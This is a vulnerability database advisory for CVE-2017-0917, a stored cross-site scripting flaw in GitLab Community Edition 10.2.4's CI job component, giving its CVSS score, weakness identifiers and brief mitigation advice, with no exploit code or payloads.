PT-2018-5144 · Gitlab · Gitlab Ce/Ee+1

Published

2018-03-18

Updated

2019-10-09

CVE-2017-0917

CVSS v3.1

6.1

Medium

Vector

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Name of the Vulnerable Software and Affected Versions Gitlab Community Edition version 10.2.4

Description The issue is related to a lack of input validation in the CI job component, resulting in persistent cross-site scripting. This allows for malicious scripts to be injected and executed, potentially leading to unauthorized access or data theft.

Recommendations For Gitlab Community Edition version 10.2.4, consider disabling the CI job component until a patch is available to prevent exploitation of the lack of input validation. Restrict access to the CI job component to minimize the risk of persistent cross-site scripting attacks.

Fix

RCE

XSS

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-20CWE-79

Related Identifiers

CVE-2017-0917

DSA-4145-1

Affected Products

Gitlab

Gitlab Ce/Ee

PT-2018-5144 · Gitlab · Gitlab Ce/Ee+1

CVE-2017-0917

Weakness Enumeration

Related Identifiers

Affected Products

References · 19